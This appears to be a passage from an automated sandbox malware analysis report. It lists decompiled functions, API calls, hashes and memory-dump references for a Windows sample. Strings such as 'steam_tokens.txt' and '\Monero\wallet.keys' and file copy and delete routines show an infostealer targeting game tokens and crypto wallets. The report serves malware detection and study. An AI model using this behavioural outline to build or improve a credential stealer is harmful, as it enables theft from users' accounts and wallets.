Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 67c314b24a071b4cff1a60ba5b311250d042f04010c97983750627e85298c3b2
Instruction ID: 0c6a681acad1b22d501ac7e8ddf6d5de71aa869980a2cdc33d2107bb0cae94cd
Opcode Fuzzy Hash: 67c314b24a071b4cff1a60ba5b311250d042f04010c97983750627e85298c3b2
Instruction Fuzzy Hash: A4F0B672D101086ACF04FBB0EC679ED772CAF65340F804668B816620A2EF656A1D87E2

Function 00181160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0018116A
ExitProcess.KERNEL32 ref: 0018117E

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 5559dd09399b3d4d711af3cdfcad18ce6e5ddc87e0634ecc1fc6c0fd488623a4
Instruction ID: 08f7529f04f61dfac5eb142e30f6fa1d0cb9bf430f20dc9ee565365e05f94100
Opcode Fuzzy Hash: 5559dd09399b3d4d711af3cdfcad18ce6e5ddc87e0634ecc1fc6c0fd488623a4
Instruction Fuzzy Hash: 35D05E7490020CDFCB00EFE09989AEDBB7DAB0E311F001655ED0562340DB305441CB65

Function 0018B370 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE

lstrlen.KERNEL32(00000000), ref: 0018B820
lstrlen.KERNEL32(00000000), ref: 0018B834

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID:
API String ID: 3073930149-0
Opcode ID: f93927fd2564edd4825aa4afb89aa00dbb04681f46e46110b225c77a5c39de93
Instruction ID: fd59819589fee08d383e52228220e29266464f6913bcb13d1476217e6ec80790
Opcode Fuzzy Hash: f93927fd2564edd4825aa4afb89aa00dbb04681f46e46110b225c77a5c39de93
Instruction Fuzzy Hash: B4E19972910118AACF15FBA4DC92EEE7338BF65300F804569F506660A1EF746B4CCBE2

Function 0018AD70 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

lstrlen.KERNEL32(00000000), ref: 0018AFEA
lstrlen.KERNEL32(00000000), ref: 0018AFFE

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 061cfd2e5aeaacee179f156f760a5a29d8be67cece126fa63be8f321d99e85dd
Instruction ID: 3b7de42e673c92c87271a61e61f8ac1d4f6f1030f510281d90b894495f5d930e
Opcode Fuzzy Hash: 061cfd2e5aeaacee179f156f760a5a29d8be67cece126fa63be8f321d99e85dd
Instruction Fuzzy Hash: 0A91BB72910108ABCF15FBA4DC96EEE7378AF65300F904569F507660A1EF746A4CCBE2

Function 0018B0B0 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

lstrlen.KERNEL32(00000000), ref: 0018B2AE
lstrlen.KERNEL32(00000000), ref: 0018B2C2

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 89a3f11541951aa9abb947d31fab7db66245551790c5530c3fd2d92ed274f4ba
Instruction ID: 50a5eb1851fd3fd9110f79f67173b188c66a3ca3bdfb7dcb1417d11dedff269a
Opcode Fuzzy Hash: 89a3f11541951aa9abb947d31fab7db66245551790c5530c3fd2d92ed274f4ba
Instruction Fuzzy Hash: DD719A72910118AACF15FBA4DC96DEE7379BF65300F804529F506A61A1EF746A0CCBE2

Function 00194690 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 001946CA
lstrcat.KERNEL32(?,013AD738), ref: 001946E8

Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423

Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672

Part of subcall function 001943F0: wsprintfA.USER32 ref: 00194490
Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A08BA), ref: 001944A5
Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944C2
Part of subcall function 001943F0: PathMatchSpecA.SHLWAPI(?,?), ref: 001944FE
Part of subcall function 001943F0: lstrcat.KERNEL32(?,013AE500), ref: 0019452A
Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FC8), ref: 0019453C
Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194550
Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FCC), ref: 00194562
Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194576
Part of subcall function 001943F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0019458C
Part of subcall function 001943F0: DeleteFileA.KERNEL32(?), ref: 00194611

Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944E7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 450db1b86dc81c30d1b72787dd29f35c53ae300be053181e0725800526e26aee
Instruction ID: c439ce58d8398f491d28f0b7354a99e22c8868b53c73abd98d80d36a72b6c2e1
Opcode Fuzzy Hash: 450db1b86dc81c30d1b72787dd29f35c53ae300be053181e0725800526e26aee
Instruction Fuzzy Hash: CA41B4BB9001046BDB55F7B4EC42EEE333DA7AA300F408548B54A96181EF755B898BA1

Function 001866B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00186756
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001867A3

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 59d0ac6d2e3631801718010bf7bd8c2911f4fee1ec0b0f692ba714aca86f7f1a
Instruction ID: 08331dfaef86c888ba7c3e4fbc1c0f69e2db76f8ca32ead0d5b104b250f4807a
Opcode Fuzzy Hash: 59d0ac6d2e3631801718010bf7bd8c2911f4fee1ec0b0f692ba714aca86f7f1a
Instruction Fuzzy Hash: 1441DE74A00209EFCB44DF58C494BADBBB1FF44314F2486A9E9499B345D735EA81CF84

Function 00194B30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 00194B6A
lstrcat.KERNEL32(?,013ADFD0), ref: 00194B88

Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: dd91929ac71a7288bb6595f5b4a8f3348464c2203b9bfe211ca77676ddc72895
Instruction ID: f848e82a978e387ee0065f07eb9d3825d3ab08d2d5eca4d343cb18fb2442bd4f
Opcode Fuzzy Hash: dd91929ac71a7288bb6595f5b4a8f3348464c2203b9bfe211ca77676ddc72895
Instruction Fuzzy Hash: 3D01967651020867CB14FB70DC46EEE733CAB66300F404599B64A97191EFB4ABC88BE1

Function 001810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001810B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001810F7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
